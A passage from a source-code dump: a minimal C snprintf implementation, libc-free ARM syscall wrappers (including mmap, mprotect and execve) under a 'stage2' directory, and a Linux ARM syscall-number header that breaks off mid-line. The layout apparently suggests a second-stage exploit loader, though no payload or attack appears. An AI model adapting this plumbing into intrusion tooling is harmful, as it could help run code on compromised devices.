vsnprintf(char *str, int count, const char *fmt, va_list args) 81 | { 82 | int n = 0; 83 | str[0] = 0; 84 | end = str + count - 1; 85 | dopr(str, fmt, args); 86 | if (count > 0) 87 | end[0] = 0; 88 | while (*str++) 89 | n++; 90 | return n; 91 | } 92 | 93 | #ifndef HAS_SNPRINTF 94 | /* VARARGS3 */ 95 | int snprintf(char *str, int count, const char *fmt,...) 96 | { 97 | int len; 98 | VA_LOCAL_DECL 99 | 100 | VA_START(fmt); 101 | len = vsnprintf(str, count, fmt, ap); 102 | VA_END; 103 | return len; 104 | } 105 | #endif 106 | 107 | /* 108 | * dopr(): poor man's version of doprintf 109 | */ 110 | 111 | static void fmtstr __P((char *value, int ljust, int len, int zpad, int maxwidth)); 112 | static void fmtnum __P((long value, int base, int dosign, int ljust, int len, int zpad)); 113 | static void dostr __P((char *, int)); 114 | static char *output; 115 | static void dopr_outch __P((int c)); 116 | 117 | static void dopr(char *buffer, const char *format, va_list args) 118 | { 119 | int ch; 120 | long value; 121 | int longflag = 0; 122 | int pointflag = 0; 123 | int maxwidth = 0; 124 | char *strvalue; 125 | int ljust; 126 | int len; 127 | int zpad; 128 | 129 | output = buffer; 130 | while ((ch = *format++)) { 131 | switch (ch) { 132 | case '%': 133 | ljust = len = zpad = maxwidth = 0; 134 | longflag = pointflag = 0; 135 | nextch: 136 | ch = *format++; 137 | switch (ch) { 138 | case 0: 139 | dostr("**end of format**", 0); 140 | return; 141 | case '-': 142 | ljust = 1; 143 | goto nextch; 144 | case '0': /* set zero padding if len not set */ 145 | if (len == 0 && !pointflag) 146 | zpad = '0'; 147 | case '1': 148 | case '2': 149 | case '3': 150 | case '4': 151 | case '5': 152 | case '6': 153 | case '7': 154 | case '8': 155 | case '9': 156 | if (pointflag) 157 | maxwidth = maxwidth * 10 + ch - '0'; 158 | else 159 | len = len * 10 + ch - '0'; 160 | goto nextch; 161 | case '*': 162 | if (pointflag) 163 | maxwidth = va_arg(args, int); 164 | else 165 | len = va_arg(args, int); 166 | goto nextch; 167 | case '.': 168 | pointflag = 1; 169 | goto nextch; 170 | case 'l': 171 | longflag = 1; 172 | goto nextch; 173 | case 'u': 174 | case 'U': 175 | /*fmtnum(value,base,dosign,ljust,len,zpad) */ 176 | if (longflag) { 177 | value = va_arg(args, long); 178 | } 179 | else { 180 | value = va_arg(args, int); 181 | } 182 | fmtnum(value, 10, 0, ljust, len, zpad); 183 | break; 184 | case 'o': 185 | case 'O': 186 | /*fmtnum(value,base,dosign,ljust,len,zpad) */ 187 | if (longflag) { 188 | value = va_arg(args, long); 189 | } 190 | else { 191 | value = va_arg(args, int); 192 | } 193 | fmtnum(value, 8, 0, ljust, len, zpad); 194 | break; 195 | case 'd': 196 | case 'D': 197 | if (longflag) { 198 | value = va_arg(args, long); 199 | } 200 | else { 201 | value = va_arg(args, int); 202 | } 203 | fmtnum(value, 10, 1, ljust, len, zpad); 204 | break; 205 | case 'x': 206 | if (longflag) { 207 | value = va_arg(args, long); 208 | } 209 | else { 210 | value = va_arg(args, int); 211 | } 212 | fmtnum(value, 16, 0, ljust, len, zpad); 213 | break; 214 | case 'X': 215 | if (longflag) { 216 | value = va_arg(args, long); 217 | } 218 | else { 219 | value = va_arg(args, int); 220 | } 221 | fmtnum(value, -16, 0, ljust, len, zpad); 222 | break; 223 | case 's': 224 | strvalue = va_arg(args, char *); 225 | if (maxwidth > 0 || !pointflag) { 226 | if (pointflag && len > maxwidth) 227 | len = maxwidth; /* Adjust padding */ 228 | fmtstr(strvalue, ljust, len, zpad, maxwidth); 229 | } 230 | break; 231 | case 'c': 232 | ch = va_arg(args, int); 233 | dopr_outch(ch); 234 | break; 235 | case '%': 236 | dopr_outch(ch); 237 | continue; 238 | default: 239 | dostr("???????", 0); 240 | } 241 | break; 242 | default: 243 | dopr_outch(ch); 244 | break; 245 | } 246 | } 247 | *output = 0; 248 | } 249 | 250 | static void fmtstr(char *value, int ljust, int len, int zpad, int maxwidth) 251 | { 252 | int padlen, strlen; /* amount to pad */ 253 | 254 | if (value == 0) { 255 | value = ""; 256 | } 257 | for (strlen = 0; value[strlen]; ++strlen); /* strlen */ 258 | if (strlen > maxwidth && maxwidth) 259 | strlen = maxwidth; 260 | padlen = len - strlen; 261 | if (padlen < 0) 262 | padlen = 0; 263 | if (ljust) 264 | padlen = -padlen; 265 | while (padlen > 0) { 266 | dopr_outch(' '); 267 | --padlen; 268 | } 269 | dostr(value, maxwidth); 270 | while (padlen < 0) { 271 | dopr_outch(' '); 272 | ++padlen; 273 | } 274 | } 275 | 276 | static void fmtnum(long value, int base, int dosign, int ljust, int len, int zpad) 277 | { 278 | int signvalue = 0; 279 | unsigned long uvalue; 280 | char convert[20]; 281 | int place = 0; 282 | int padlen = 0; /* amount to pad */ 283 | int caps = 0; 284 | 285 | /* DEBUGP(("value 0x%x, base %d, dosign %d, ljust %d, len %d, zpad %d\n", 286 | value, base, dosign, ljust, len, zpad )); */ 287 | uvalue = value; 288 | if (dosign) { 289 | if (value < 0) { 290 | signvalue = '-'; 291 | uvalue = -value; 292 | } 293 | } 294 | if (base < 0) { 295 | caps = 1; 296 | base = -base; 297 | } 298 | do { 299 | convert[place++] = 300 | (caps ? "0123456789ABCDEF" : "0123456789abcdef") 301 | [uvalue % (unsigned) base]; 302 | uvalue = (uvalue / (unsigned) base); 303 | } while (uvalue); 304 | convert[place] = 0; 305 | padlen = len - place; 306 | if (padlen < 0) 307 | padlen = 0; 308 | if (ljust) 309 | padlen = -padlen; 310 | /* DEBUGP(( "str '%s', place %d, sign %c, padlen %d\n", 311 | convert,place,signvalue,padlen)); */ 312 | if (zpad && padlen > 0) { 313 | if (signvalue) { 314 | dopr_outch(signvalue); 315 | --padlen; 316 | signvalue = 0; 317 | } 318 | while (padlen > 0) { 319 | dopr_outch(zpad); 320 | --padlen; 321 | } 322 | } 323 | while (padlen > 0) { 324 | dopr_outch(' '); 325 | --padlen; 326 | } 327 | if (signvalue) 328 | dopr_outch(signvalue); 329 | while (place > 0) 330 | dopr_outch(convert[--place]); 331 | while (padlen < 0) { 332 | dopr_outch(' '); 333 | ++padlen; 334 | } 335 | } 336 | 337 | static void dostr(char *str, int cut) 338 | { 339 | if (cut) { 340 | while (*str && cut-- > 0) 341 | dopr_outch(*str++); 342 | } 343 | else { 344 | while (*str) 345 | dopr_outch(*str++); 346 | } 347 | } 348 | 349 | static void dopr_outch(int c) 350 | { 351 | #if 0 352 | if (iscntrl(c) && c != '\n' && c != '\t') { 353 | c = '@' + (c & 0x1F); 354 | if (end == 0 || output < end) 355 | *output++ = '^'; 356 | } 357 | #endif 358 | if (end == 0 || output < end) 359 | *output++ = c; 360 | } 361 | 362 | #endif 363 | 364 | -------------------------------------------------------------------------------- /stage2/syscall_arm.c: -------------------------------------------------------------------------------- 1 | #include "syscall_arm.h" 2 | #include "linuxdefs.h" 3 | 4 | ssize_t _read(int fd, void *buf, size_t size) 5 | { 6 | ssize_t ret; 7 | register int r0 asm ("r0") = (int)fd; 8 | register int r1 asm ("r1") = (int)buf; 9 | register int r2 asm ("r2") = (int)size; 10 | register int r7 asm ("r7") = __NR_read; 11 | 12 | asm volatile 13 | ( 14 | "swi #0; mov %0, r0" 15 | : "=r" (ret) 16 | : "r"(r7), "r"(r0), "r"(r1), "r"(r2) 17 | ); 18 | return ret; 19 | } 20 | 21 | ssize_t _write(int fd, const void *buf, size_t size) 22 | { 23 | ssize_t ret; 24 | register int r0 asm ("r0") = (int)fd; 25 | register int r1 asm ("r1") = (int)buf; 26 | register int r2 asm ("r2") = (int)size; 27 | register int r7 asm ("r7") = __NR_write; 28 | 29 | asm volatile 30 | ( 31 | "swi #0; mov %0, r0" 32 | : "=r" (ret) 33 | : "r"(r7), "r"(r0), "r"(r1), "r"(r2) 34 | ); 35 | return ret; 36 | } 37 | 38 | int _open(char * path, int mode, int flags) 39 | { 40 | long ret; 41 | register int r0 asm ("r0") = (int)path; 42 | register int r1 asm ("r1") = (int)mode; 43 | register int r2 asm ("r2") = (int)flags; 44 | register int r7 asm ("r7") = __NR_open; 45 | 46 | asm volatile 47 | ( 48 | "swi #0; mov %0, r0" 49 | : "=r" (ret) 50 | : "r"(r7), "r"(r0), "r"(r1), "r"(r2) 51 | ); 52 | return ret; 53 | } 54 | 55 | int _close(int fd) 56 | { 57 | long ret; 58 | register int r0 asm ("r0") = (int)fd; 59 | register int r7 asm ("r7") = __NR_close; 60 | 61 | asm volatile 62 | ( 63 | "swi #0; mov %0, r0" 64 | : "=r" (ret) 65 | : "r"(r7), "r"(r0) 66 | ); 67 | return ret; 68 | } 69 | 70 | long _lseek(int fd, long offset, int whence) 71 | { 72 | long ret; 73 | register int r0 asm ("r0") = (int)fd; 74 | register int r1 asm ("r1") = (int)offset; 75 | register int r2 asm ("r2") = (int)whence; 76 | register int r7 asm ("r7") = __NR_lseek; 77 | 78 | asm volatile 79 | ( 80 | "swi #0; mov %0, r0" 81 | : "=r" (ret) 82 | : "r"(r7), "r"(r0), "r"(r1), "r"(r2) 83 | ); 84 | return ret; 85 | } 86 | 87 | void * _mmap(void * start, long length, int prot, int flags, int fd, long offset) 88 | { 89 | void * ret; 90 | register int r0 asm ("r0") = (int)start; 91 | register int r1 asm ("r1") = (int)length; 92 | register int r2 asm ("r2") = (int)prot; 93 | register int r3 asm ("r3") = (int)flags; 94 | register int r4 asm ("r4") = (int)fd; 95 | register int r5 asm ("r5") = (int)offset; 96 | register int r7 asm ("r7") = __NR_mmap2; 97 | 98 | asm volatile 99 | ( 100 | "swi #0; mov %0, r0" 101 | : "=r" (ret) 102 | : "r"(r7), "r"(r0), "r"(r1), "r"(r2), "r"(r3), "r"(r4), "r"(r5) 103 | ); 104 | return ret; 105 | } 106 | 107 | long _mprotect(void * addr, long len, int prot) 108 | { 109 | long ret; 110 | register int r0 asm ("r0") = (int)addr; 111 | register int r1 asm ("r1") = (int)len; 112 | register int r2 asm ("r2") = (int)prot; 113 | register int r7 asm ("r7") = __NR_mprotect; 114 | 115 | asm volatile 116 | ( 117 | "swi #0; mov %0, r0" 118 | : "=r" (ret) 119 | : "r"(r7), "r"(r0), "r"(r1), "r"(r2) 120 | ); 121 | return ret; 122 | } 123 | 124 | long _munmap(char * start, int length) 125 | { 126 | long ret; 127 | register int r0 asm ("r0") = (int)start; 128 | register int r1 asm ("r1") = (int)length; 129 | register int r7 asm ("r7") = __NR_munmap; 130 | 131 | asm volatile 132 | ( 133 | "swi #0; mov %0, r0" 134 | : "=r" (ret) 135 | : "r"(r7), "r"(r0), "r"(r1) 136 | ); 137 | return ret; 138 | } 139 | 140 | long _brk(unsigned long addr) 141 | { 142 | long ret; 143 | register int r0 asm ("r0") = (int)addr; 144 | register int r7 asm ("r7") = __NR_brk; 145 | 146 | asm volatile 147 | ( 148 | "swi #0; mov %0, r0" 149 | : "=r" (ret) 150 | : "r"(r7), "r"(r0) 151 | ); 152 | return ret; 153 | } 154 | 155 | int _exit(int level) 156 | { 157 | long ret; 158 | register int r0 asm ("r0") = (int)level; 159 | register int r7 asm ("r7") = __NR_exit; 160 | 161 | asm volatile 162 | ( 163 | "swi #0; mov %0, r0" 164 | : "=r" (ret) 165 | : "r"(r7), "r"(r0) 166 | ); 167 | return ret; 168 | } 169 | 170 | void raise(void) 171 | { 172 | _exit(-1); 173 | } 174 | 175 | long _execve(char * filename, char ** argv, char ** envp) 176 | { 177 | long ret; 178 | register int r0 asm ("r0") = (int)filename; 179 | register int r1 asm ("r1") = (int)argv; 180 | register int r2 asm ("r2") = (int)envp; 181 | register int r7 asm ("r7") = __NR_execve; 182 | 183 | asm volatile 184 | ( 185 | "swi #0; mov %0, r0" 186 | : "=r" (ret) 187 | : "r"(r7), "r"(r0), "r"(r1), "r"(r2) 188 | ); 189 | return ret; 190 | } 191 | -------------------------------------------------------------------------------- /stage2/syscall_arm.h: -------------------------------------------------------------------------------- 1 | /* 2 | * arch/arm/include/asm/unistd.h 3 | * 4 | * Copyright (C) 2001-2005 Russell King 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License version 2 as 8 | * published by the Free Software Foundation. 9 | * 10 | * Please forward _all_ changes to this file to rmk@arm.linux.org.uk, 11 | * no matter what the change is. Thanks! 12 | */ 13 | #ifndef _SYMB__ASM_ARM_UNISTD_H 14 | #define _SYMB__ASM_ARM_UNISTD_H 15 | 16 | #define __NR_OABI_SYSCALL_BASE 0x900000 17 | 18 | #if defined(__thumb__) || defined(__ARM_EABI__) 19 | #define __NR_SYSCALL_BASE 0 20 | #else 21 | #define __NR_SYSCALL_BASE __NR_OABI_SYSCALL_BASE 22 | #endif 23 | 24 | /* 25 | * This file contains the system call numbers. 26 | */ 27 | 28 | #define __NR_restart_syscall (__NR_SYSCALL_BASE+ 0) 29 | #define __NR_exit (__NR_SYSCALL_BASE+ 1) 30 | #define __NR_fork (__NR_SYSCALL_BASE+ 2) 31 | #define __NR_read (__NR_SYSCALL_BASE+ 3) 32 | #define __NR_write (__NR_SYSCALL_BASE+ 4) 33 | #define __NR_open (__NR_SYSCALL_BASE+ 5) 34 | #define __NR_close (__NR_SYSCALL_BASE+ 6) 35 | /* 7 was sys_waitpid */ 36 | #define __NR_creat (__NR_SYSCALL_BASE+ 8) 37 | #define __NR_link (__NR_SYSCALL_BASE+ 9) 38 | #define __NR_unlink (__NR_SYSCALL_BASE+ 10) 39 | #define __NR_execve (__NR_SYSCALL_BASE+ 11) 40 | #define __NR_chdir (__NR_SYSCALL_BASE+ 12) 41 | #define __NR_time (__NR_SYSCALL_BASE+ 13) 42 | #define __NR_mknod (__NR_SYSCALL_BASE+ 14) 43 | #define __NR_chmod (__NR_SYSCALL_BASE+ 15) 44 | #define __NR_lchown (__NR_SYSCALL_BASE+ 16) 45 | /* 17 was sys_break */ 46 | /* 18 was sys_stat */ 47 | #define __NR_lseek (__NR_SYSCALL_BASE+ 19) 48 | #define __NR_getpid (__NR_SYSCALL_BASE+ 20) 49 | #define __NR_mount (__NR_SYSCALL_BASE+ 21) 50 | #define __NR_umount (__NR_SYSCALL_BASE+ 22) 51 | #define __NR_setuid (__NR_SYSCALL_BASE+ 23) 52 | #define __NR_getuid (__NR_SYSCALL_BASE+ 24) 53 | #define __NR_stime (__NR_SYSCALL_BASE+ 25) 54 | #define __NR_ptrace (__NR_SYSCALL_BASE+ 26) 55 | #define __NR_alarm (__NR_SYSCALL_BASE+ 27) 56 | /* 28 was sys_fstat */ 57 | #define __NR_pause (__NR_SYSCALL_BASE+ 29) 58 | #define __NR_utime (__NR_SYSCALL_BASE+ 30) 59 | /* 31 was sys_stty */ 60 | /* 32 was sys_gtty */ 61 | #define __NR_access (__NR_SYSCALL_BASE+ 33) 62 | #define __NR_nice (__NR_SYSCALL_BASE+ 34) 63 | /* 35 was sys_ftime */ 64 | #define __NR_sync (__NR_SYSCALL_BASE+ 36) 65 | #define __NR_kill (__NR_SYSCALL_BASE+ 37) 66 | #define __NR_rename (__NR_SYSCALL_BASE+ 38) 67 | #define __NR_mkdir (__NR_SYSCALL_BASE+ 39) 68 | #define __NR_rmdir (__NR_SYSCALL_BASE+ 40) 69 | #define __NR_dup (__NR_SYSCALL_BASE+ 41) 70 | #define __NR_pipe (__NR_SYSCALL_BASE+ 42) 71 | #define __NR_times (__NR_SYSCALL_BASE+ 43) 72 | /* 44 was sys_prof */ 73 | #define __NR_brk (__NR_SYSCALL_BASE+ 45) 74 | #define __NR_setgid (__NR_SYSCALL_BASE+ 46) 75 | #define __NR_getgid (__NR_SYSCALL_BASE+ 47) 76 | /* 48 was sys_signal */ 77 | #define __NR_geteuid (__NR_SYSCALL_BASE+ 49) 78 | #define __NR_getegid (__NR_SYSCALL_BASE+ 50) 79 | #define __NR_acct (__NR_SYSCALL_BASE+ 51) 80 | #define __NR_umount2 (__NR_SYSCALL_BASE+ 52) 81 | /* 53 was sys_lock */ 82 | #define __NR_ioctl (__NR_SYSCALL_BASE+ 54) 83 | #define __NR_fcntl (__NR_SYSCALL_BASE+ 55) 84 | /* 56 was sys_mpx */ 85 | #define __NR_setpgid (__NR_SYSCALL_BASE+ 57) 86 | /* 58 was sys_ulimit */ 87 | /* 59 was sys_olduname */ 88 | #define __NR_umask (__NR_SYSCALL_BASE+ 60) 89 | #define __NR_chroot (__NR_SYSCALL_BASE+ 61) 90 | #define __NR_ustat (__NR_SYSCALL_BASE+ 62) 91 | #define __NR_dup2 (__NR_SYSCALL_BASE+ 63) 92 | #define __NR_getppid (__NR_SYSCALL_BASE+ 64) 93 | #define __NR_getpgrp (__NR_SYSCALL_BASE+ 65) 94 | #define __NR_setsid (__NR_SYSCALL_BASE+ 66) 95 | #define __NR_sigaction (__NR_SYSCALL_BASE+ 67) 96 | /* 68 was sys_sgetmask */ 97 | /* 69 was sys_ssetmask */ 98 | #define __NR_setreuid (__NR_SYSCALL_BASE+ 70) 99 | #define __NR_setregid (__NR_SYSCALL_BASE+ 71) 100 | #define __NR_sigsuspend (__NR_SYSCALL_BASE+ 72) 101 | #define __NR_sigpending (__NR_SYSCALL_BASE+ 73) 102 | #define __NR_sethostname (__NR_SYSCALL_BASE+ 74) 103 | #define __NR_setrlimit (__NR_SYSCALL_BASE+ 75) 104 | #define __NR_getrlimit (__NR_SYSCALL_BASE+ 76) /* Back compat 2GB limited rlimit */ 105 | #define __NR_getrusage (__NR_SYSCALL_BASE+ 77) 106 | #define __NR_gettimeofday (__NR_SYSCALL_BASE+ 78) 107 | #define __NR_settimeofday (__NR_SYSCALL_BASE+ 79) 108 | #define __NR_getgroups (__NR_SYSCALL_BASE+ 80) 109 | #define __NR_setgroups (__NR_SYSCALL_BASE+ 81) 110 | #define __NR_select (__NR_SYSCALL_BASE+ 82) 111 | #define __NR_symlink (__NR_SYSCALL_BASE+ 83) 112 | /* 84 was sys_lstat */ 113 | #define __NR_readlink (__NR_SYSCALL_BASE+ 85) 114 | #define __NR_uselib (__NR_SYSCALL_BASE+ 86) 115 | #define __NR_swapon (__NR_SYSCALL_BASE+ 87) 116 | #define __NR_reboot (__NR_SYSCALL_BASE+ 88) 117 | #define __NR_readdir (__NR_SYSCALL_BASE+ 89) 118 | #define __NR_mmap (__NR_SYSCALL_BASE+ 90) 119 | #define __NR_munmap (__NR_SYSCALL_BASE+ 91) 120 | #define __NR_truncate (__NR_SYSCALL_BASE+ 92) 121 | #define __NR_ftruncate (__NR_SYSCALL_BASE+ 93) 122 | #define __NR_fchmod (__NR_SYSCALL_BASE+ 94) 123 | #define __NR_fchown (__NR_SYSCALL_BASE+ 95) 124 | #define __NR_getpriority (__NR_SYSCALL_BASE+ 96) 125 | #define __NR_setpriority (__NR_SYSCALL_BASE+ 97) 126 | /* 98 was sys_profil */ 127 | #define __NR_statfs (__NR_SYSCALL_BASE+ 99) 128 | #define __NR_fstatfs (__NR_SYSCALL_BASE+100) 129 | /* 101 was sys_ioperm */ 130 | #define __NR_socketcall (__NR_SYSCALL_BASE+102) 131 | #define __NR_syslog (__NR_SYSCALL_BASE+103) 132 | #define __NR_setitimer (__NR_SYSCALL_BASE+104) 133 | #define __NR_getitimer (__NR_SYSCALL_BASE+105) 134 | #define __NR_stat (__NR_SYSCALL_BASE+106) 135 | #define __NR_lstat (__NR_SYSCALL_BASE+107) 136 | #define __NR_fstat (__NR_SYSCALL_BASE+108) 137 | /* 109 was sys_uname */ 138 | /* 110 was sys_iopl */ 139 | #define __NR_vhangup (__NR_SYSCALL_BASE+111) 140 | /* 112 was sys_idle */ 141 | #define __NR_syscall (__NR_SYSCALL_BASE+113) /* syscall to call a syscall! */ 142 | #define __NR_wait4 (__NR_SYSCALL_BASE+114) 143 | #define __NR_swapoff (__NR_SYSCALL_BASE+115) 144 | #define __NR_sysinfo (__NR_SYSCALL_BASE+116) 145 | #define __NR_ipc (__NR_SYSCALL_BASE+117) 146 | #define __NR_fsync (__NR_SYSCALL_BASE+118) 147 | #define __NR_sigreturn (__NR_SYSCALL_BASE+119) 148 | #define __NR_clone (__NR_SYSCALL_BASE+120) 149 | #define __NR_setdomainname (__NR_SYSCALL_BASE+121) 150 | #define __NR_uname (__NR_SYSCALL_BASE+122) 151 | /* 123 was sys_modify_ldt */ 152 | #define __NR_adjtimex (__NR_SYSCALL_BASE+124) 153 | #define __NR_mprotect (__NR_SYSCALL_BASE+125) 154 | #define __NR_sigprocmask (__NR_SYSCALL_BASE+126) 155 | /* 127 was sys_create_module */ 156 | #define __NR_init_module (__NR_SYSCALL_BASE+128) 157 | #define __NR_delete_module (__NR_SYSCALL_BASE+129) 158 | /* 130 was sys_get_kernel_syms */ 159 | #define __NR_quotactl (__NR_SYSCALL_BASE+131) 160 | #define __NR_getpgid (__NR_SYSCALL_BASE+132) 161 | #define __NR_fchdir (__NR_SYSCALL_BASE+133) 162 | #define __NR_bdflush (__NR_SYSCALL_BASE+134) 163 | #define __NR_sysfs (__NR_SYSCALL_BASE+135) 164 | #define __NR_personality (__NR_SYSCALL_BASE+136) 165 | /* 137 was sys_afs_syscall */ 166 | #define __NR_setfsuid (__NR_SYSCALL_BASE+138) 167 | #define __NR_setfsgid (__NR_SYSCALL_BASE+139) 168 | #define __NR__llseek (__NR_SYSCALL_BASE+140) 169 | #define __NR_getdents (__NR_SYSCALL_BASE+141) 170 | #define __NR__newselect (__NR_SYSCALL_BASE+142) 171 | #define __NR_flock (__NR_SYSCALL_BASE+143) 172 | #define __NR_msync (__NR_SYSCALL_BASE+144) 173 | #define __NR_readv (__NR_SYSCALL_BASE+145) 174 | #define __NR_writev (__NR_SYSCALL_BASE+146) 175 | #define __NR_getsid (__NR_SYSCALL_BASE+147) 176 | #define __NR_fdatasync (__NR_SYSCALL_BASE+148) 177 | #define __NR__sysctl (__NR_SYSCALL_BASE+149) 178 | #define __NR_mlock (__NR_SYSCALL_BASE+150) 179 | #define __NR_munlock (__NR_SYSCALL_BASE+151) 180 | #define __NR_mlockall (__NR_SYSCALL_BASE+152) 181 | #define __NR_munlockall (__NR_SYSCALL_BASE+153) 182 | #define __NR_sched_setparam (__NR_SYSCALL_BASE+154) 183 | #define __NR_sched_getparam (__NR_SYSCALL_BASE+155) 184 | #define __NR_sched_setscheduler (__NR_SYSCALL_BASE+156) 185 | #define __NR_sched_getscheduler (__NR_SYSCALL_BASE+157) 186 | #define __NR_sched_yield (__NR_SYSCALL_BASE+158) 187 | #define __NR_sched_get_priority_max (__NR_SYSCALL_BASE+159) 188 | #define __NR_sched_get_priority_min (__NR_SYSCALL_BASE+160) 189 | #define __NR_sched_rr_get_interval (__NR_SYSCALL_BASE+161) 190 | #define __NR_nanosleep (__NR_SYSCALL_BASE+162) 191 | #define __NR_mremap (__NR_SYSCALL_BASE+163) 192 | #define __NR_setresuid (__NR_SYSCALL_BASE+164) 193 | #define __NR_getresuid (__NR_SYSCALL_BASE+165) 194 | /* 166 was sys_vm86 */ 195 | /* 167 was sys_query_module */ 196 | #define __NR_poll (__NR_SYSCALL_BASE+168) 197 | #define __NR_nfsservctl (__NR_SYSCALL_BASE+169) 198 | #define __NR_setresgid (__NR_SYSCALL_BASE+170) 199 | #define __NR_getresgid (__NR_SYSCALL_BASE+171) 200 | #define __NR_prctl (__NR_SYSCALL_BASE+172) 201 | #define __NR_rt_sigreturn (__NR_SYSCALL_BASE+173) 202 | #define __NR_rt_sigaction (__NR_SYSCALL_BASE+174) 203 | #define __NR_rt_sigprocmask (__NR_SYSCALL_BASE+175) 204 | #define __NR_rt_sigpending (__NR_SYSCALL_BASE+176) 205 | #define __NR_rt_sigtimedwait (__NR_SYSCALL_BASE+177) 206 | #define __NR_rt_sigqueueinfo (__NR_SYSCALL_BASE+178) 207 | #define __NR_rt_sigsuspend (__NR_SYSCALL_BASE+179) 208 | #define __NR_pread64 (__NR_SYSCALL_BASE+180) 209 | #define __NR_pwrite64 (__NR_SYSCALL_BASE+181) 210 | #define __NR_chown (__NR_SYSCALL_BASE+182) 211 | #define __NR_getcwd (__NR_SYSCALL_BASE+183) 212 | #define __NR_capget (__NR_SYSCALL_BASE+184) 213 | #define __NR_capset (__NR_SYSCALL_BASE+185) 214 | #define __NR_sigaltstack (__NR_SYSCALL_BASE+186) 215 | #define __NR_sendfile (__NR_SYSCALL_BASE+187) 216 | /* 188 reserved */ 217 | /* 189 reserved */ 218 | #define __NR_vfork (__NR_SYSCALL_BASE+190) 219 | #define __NR_ugetrlimit (__NR_SYSCALL_BASE+191) /* SuS compliant getrlimit */ 220 | #define __NR_mmap2 (__NR_SYSCALL_BASE+192) 221 | #define __NR_truncate64 (__NR_SYSCALL_BASE+193) 222 | #define __NR_ftruncate64 (__NR_SYSCALL_BASE+194) 223 | #define __NR_stat64 (__NR_SYSCALL_BASE+195) 224 | #define __NR_lstat64 (__NR_SYSCALL_BASE+196) 225 | #define __NR_fstat64 (__NR_SYSCALL_BASE+197) 226 | #define __NR_lchown32 (__NR_SYSCALL_BASE+198) 227 | #define __NR_getuid32 (__NR_SYSCALL_BASE+199) 228 | #define __NR_getgid32 (__NR_SYSCALL_BASE+200) 229 | #define __NR_geteuid32 (__NR_SYSCALL_BASE+201) 230 | #define __NR_getegid32 (__NR_SYSCALL_BASE+202) 231 | #define __NR_setreuid32 (__NR_SYSCALL_BASE+203) 232 | #define __NR_setregid32 (__NR_SYSCALL_BASE+204) 233 | #define __NR_getgroups32 (__NR_SYSCALL_BASE+205) 234 | #define __NR_setgroups32 (__NR_SYSCALL_BASE+206) 235 | #define __NR_fchown32 (__NR_SYSCALL_BASE+207) 236 | #define __NR_setresuid32 (__NR_SYSCALL_BASE+208) 237 | #define __NR_getresuid32 (__NR_SYSCALL_BASE+209) 238 | #define __NR_setresgid32 (__NR_SYSCALL_BASE+210) 239 | #define __NR_getresgid32 (__NR_SYSCALL_BASE+211) 240 | #define __NR_chown32 (__NR_SYSCALL_BASE+212) 241 | #define __NR_setuid32 (__NR_SYSCALL_BASE+213) 242 | #define __NR_setgid32 (__NR_SYSCALL_BASE+214) 243 | #define __NR_setfsuid32 (__NR_SYSCALL_BASE+215) 244 | #define __NR_setfsgid32 (__NR_SYSCALL_BASE+216) 245 | #define __NR_getdents64 (__NR_SYSCALL_BASE+217) 246 | #define __NR_pivot_root (__NR_SYSCALL_BASE+218) 247 | #define __NR_mincore (__NR_SYSCALL_BASE+219) 248 | #define __NR_madvise (__NR_SYSCALL_BASE+220) 249 | #define __NR_fcntl64 (__NR_SYSCALL_BASE+221) 250 | /* 222 for tux */ 251 | /* 223 is unused */ 252 | #define __NR_gettid (__NR_SYSCALL_BASE+224) 253 | #define __NR_readahead (__NR_SYSCALL_BASE+225) 254 | #define __NR_setxattr (__NR_SYSCALL_BASE+226) 255 | #define __NR_lsetxattr (__NR_SYSCALL_BASE+227) 256 | #define __NR_fsetxattr (__NR_SYSCALL_BASE+228) 257 | #define __NR_getxattr (__NR_SYSCALL_BASE+229) 258 | #define __NR_lgetxattr (__NR_SYSCALL_BASE+230) 259 | #define __NR_fgetxattr (__NR_SYSCALL_BASE+231) 260 | #define __NR_listxattr (__NR_SYSCALL_BASE+232) 261 | #define __NR_llistxattr (__NR_SYSCALL_BASE+233) 262 | #define __NR_flistxattr (__NR_SYSCALL_BASE+234) 263 | #define __NR_removexattr (__NR_SYSCALL_BASE+235) 264 | #define __NR_lremovexattr (__NR_SYSCALL_BASE+236) 265 | #define __NR_fremovexattr (__NR_SYSCALL_BASE+237) 266 | #define __NR_tkill (__NR_SYSCALL_BASE+238) 267 | #define __NR_sendfile64 (__NR_SYSCALL_BASE+239) 268 | #define __NR_futex (__NR_SYSCALL_BASE+240) 269 | #define __NR_sched_setaffinity (__NR_SYSCALL_BASE+241) 270 | #define __NR_sched_getaffinity (__NR_SYSCALL_BASE+242) 271 | #define __NR_io_setup (__NR_SYSCALL_BASE+243) 272 | #define __NR_io_destroy (__NR_SYSCALL_BASE+244) 273 | #define __NR_io_getevents (__NR_SYSCALL_BASE+245) 274 | #define __NR_io_submit (__NR_SYSCALL_BASE+246) 275 | #define __NR_io_cancel (__NR_SYSCALL_BASE+247) 276 | #define __NR_exit_group (__NR_SYSCALL_BASE+248) 277 | #define __NR_lookup_dcookie (__NR_SYSCALL_BASE+249) 278 | #define __NR_epoll_create (__NR_SYSCALL_BASE+250) 279 | #define __NR_epoll_ctl (__NR_SYSCALL_BASE+251) 280 | #define __NR_epoll_wait (__NR_SYSCALL_BASE+252) 281 | #define __NR_remap_file_pages (__NR_SYSCALL_BASE+253) 282 | /* 254 for set_thread_area */ 283 | /* 255 for get_thread_area */ 284 | #define __NR_set_tid_address (__NR_SYSCALL_BASE+256) 285 | #define __NR_timer_create (__NR_SYSCALL_BASE+257) 286 | #define __NR_timer_settime (__NR_SYSCALL_BASE+258) 287 | #define __NR_timer_gettime (__NR_SYSCALL_BASE+259) 288 | #define __NR_timer_getoverrun (__NR_SYSCALL_BASE+260) 289 | #define __NR_timer_delete (__NR_SYSCALL_BASE+261) 290 | #define __NR_clock_settime (__NR_SYSCALL_BASE+262) 291 | #define __NR_clock_gettime (__NR_SYSCALL_BASE+263) 292 | #define __NR_clock_getres (__NR_SYSCALL_BASE+264) 293 | #define __NR_clock_nanosleep (__NR_SYSCALL_BASE+265) 294 | #define __NR_statfs64 (__NR_SYSCALL_BASE+266) 295 | #define __NR_fstatfs64 (__NR_SYSCALL_BASE+267) 296 | #define __NR_tgkill (__NR_SYSCALL_BASE+268) 297 | #define __NR_utimes (__NR_SYSCALL_BASE+269) 298 | #define __NR_arm_fadvise64_64 (__NR_SYSCALL_BASE+270) 299 | #define __NR_pciconfig_iobase (__NR_SYSCALL_BASE+271) 300 | #define __NR_pciconfig_read (__NR_SYSCALL_BASE+272) 301 | #define __NR_pciconfig_write 